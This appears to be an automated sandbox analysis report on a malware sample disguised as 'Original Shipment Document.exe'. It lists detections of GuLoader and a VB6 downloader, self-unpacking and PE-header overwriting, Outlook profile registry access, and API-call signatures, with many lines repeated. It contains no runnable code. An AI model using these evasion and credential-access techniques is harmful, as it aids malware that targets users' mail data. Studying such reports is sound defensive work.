Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32			Jump to behavior

Source: Window Recorder	Window detected: More than 3 window changes detected
Source: Window Recorder	Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll			Jump to behavior

Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: Original Shipment Document.exe
Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: Original Shipment Document.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 1.2.Original Shipment Document.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.data:W;.rsrc:R;
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 1.2.Original Shipment Document.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.data:W;.rsrc:R;
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.2310000.3.unpack
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.2310000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 1.2.Original Shipment Document.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 1.2.Original Shipment Document.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Unpacked PE file: 12.2.Original Shipment Document.exe.400000.0.unpack

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 5852, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 5240, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: Original Shipment Document.exe PID: 5852, type: MEMORY

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00444250 push 004442DDh; ret	0_2_004442D5
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C020 push 0040C038h; ret	0_2_0040C030
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C03A push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C03C push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00410150 push 004101B1h; ret	0_2_004101A9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C11A push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C11C push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C120 push 0046C153h; ret	0_2_0046C14B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C1DC push 0046C208h; ret	0_2_0046C200
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0045A1D8 push ecx; mov dword ptr [esp], edx	0_2_0045A1DD
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004281DC push 00428208h; ret	0_2_00428200
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004441E8 push 0044424Eh; ret	0_2_00444246
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428190 push 004281D1h; ret	0_2_004281C9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004101B4 push 004103B5h; ret	0_2_004103AD
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428214 push 0042824Ch; ret	0_2_00428244
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C22C push 0046C26Fh; ret	0_2_0046C267
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0041C234 push ecx; mov dword ptr [esp], edx	0_2_0041C239
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C2EC push 0046C318h; ret	0_2_0046C310
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C294 push 0046C2D7h; ret	0_2_0046C2CF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00432364 push 004323BDh; ret	0_2_004323B5
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C324 push 0046C350h; ret	0_2_0046C348
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004263D8 push 004264A8h; ret	0_2_004264A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004103B8 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00412470 push eax; retf 0041h	0_2_00412471
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0041A4C8 push ecx; mov dword ptr [esp], edx	0_2_0041A4CA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004104D0 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0047055C push 00470588h; ret	0_2_00470580
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00406576 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00406578 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428538 push 00428564h; ret	0_2_0042855C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0042C5E4 push 0042C610h; ret	0_2_0042C608
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00444250 push 004442DDh; ret	0_2_004442D5
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C020 push 0040C038h; ret	0_2_0040C030
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C03A push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C03C push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00410150 push 004101B1h; ret	0_2_004101A9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C11A push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040C11C push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C120 push 0046C153h; ret	0_2_0046C14B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C1DC push 0046C208h; ret	0_2_0046C200
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0045A1D8 push ecx; mov dword ptr [esp], edx	0_2_0045A1DD
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004281DC push 00428208h; ret	0_2_00428200
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004441E8 push 0044424Eh; ret	0_2_00444246
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428190 push 004281D1h; ret	0_2_004281C9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004101B4 push 004103B5h; ret	0_2_004103AD
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428214 push 0042824Ch; ret	0_2_00428244
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C22C push 0046C26Fh; ret	0_2_0046C267
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0041C234 push ecx; mov dword ptr [esp], edx	0_2_0041C239
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C2EC push 0046C318h; ret	0_2_0046C310
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C294 push 0046C2D7h; ret	0_2_0046C2CF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00432364 push 004323BDh; ret	0_2_004323B5
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0046C324 push 0046C350h; ret	0_2_0046C348
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004263D8 push 004264A8h; ret	0_2_004264A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004103B8 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00412470 push eax; retf 0041h	0_2_00412471
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0041A4C8 push ecx; mov dword ptr [esp], edx	0_2_0041A4CA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004104D0 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0047055C push 00470588h; ret	0_2_00470580
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00406576 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00406578 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00428538 push 00428564h; ret	0_2_0042855C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0042C5E4 push 0042C610h; ret	0_2_0042C608

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00457EFC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00457EFC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043E4F4 IsIconic,GetCapture,	0_2_0043E4F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00426BA4 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00426BA4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043ED9C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_0043ED9C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00454FF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_00454FF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043F680 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0043F680
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00457EFC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00457EFC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043E4F4 IsIconic,GetCapture,	0_2_0043E4F4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00426BA4 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00426BA4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043ED9C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_0043ED9C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00454FF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_00454FF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043F680 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0043F680

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,		0_2_00443C20

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
